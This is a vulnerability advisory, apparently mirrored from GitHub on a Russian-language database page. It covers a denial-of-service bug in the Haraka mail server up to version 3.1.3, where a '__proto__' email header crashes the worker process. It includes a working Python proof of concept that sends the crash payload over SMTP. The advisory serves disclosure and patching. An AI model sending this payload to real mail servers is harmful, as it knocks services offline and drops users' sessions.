Опубликовано: 01 апр. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.7
CVSS3: 7.5
Описание
Haraka affected by DoS via __proto__ email header
Summary
Sending an email with __proto__: as a header name crashes the Haraka worker process.
Details
The header parser at node_modules/haraka-email-message/lib/header.js:215-218 stores headers in a plain {} object:
_add_header(key, value, method) {
this.headers[key] ??= [] // line 216
this.headers[key][method](value) // line 217
}
When key is __proto__:
this.headers['__proto__']returnsObject.prototype(the prototype getter)Object.prototypeis not null/undefined, so??=is skippedObject.prototype.push(value)throwsTypeError: not a function
The TypeError reaches the global uncaughtException handler at haraka.js:26-33, which calls process.exit(1):
process.on('uncaughtException', (err) => {
if (err.stack) {
err.stack.split('\n').forEach((line) => logger.crit(line))
} else {
logger.crit(`Caught exception: ${JSON.stringify(err)}`)
}
logger.dump_and_exit(1)
})
PoC
import socket, time
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(("127.0.0.1", 2525))
sock.recv(4096)
sock.sendall(b"EHLO evil\r\n"); sock.recv(4096)
sock.sendall(b"MAIL FROM:<x@x.com>\r\n"); sock.recv(4096)
sock.sendall(b"RCPT TO:<user@haraka.local>\r\n"); sock.recv(4096)
sock.sendall(b"DATA\r\n"); sock.recv(4096)
# Crash payload
sock.sendall(b"From: x@x.com\r\n__proto__: crash\r\n\r\nbody\r\n.\r\n")
Impact
In single-process mode (nodes=0), the entire server goes down. In cluster mode, the master restarts the worker, but all sessions are lost.
Пакеты
Наименование
Haraka
npm
Затронутые версииВерсия исправления
<= 3.1.3
3.1.4
Связанные уязвимости
CVSS3: 7.5
nvd
9 дней назад
Haraka is a Node.js mail server. Prior to version 3.1.4, sending an email with __proto__: as a header name crashes the Haraka worker process. This issue has been patched in version 3.1.4.